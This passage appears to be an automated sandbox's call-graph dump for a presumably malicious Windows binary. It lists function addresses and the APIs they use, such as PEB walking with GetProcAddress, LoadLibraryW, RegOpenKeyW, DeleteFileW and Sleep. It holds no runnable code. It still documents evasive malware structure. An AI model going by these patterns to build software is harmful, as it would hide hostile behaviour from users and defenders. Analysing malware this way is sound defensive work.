GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 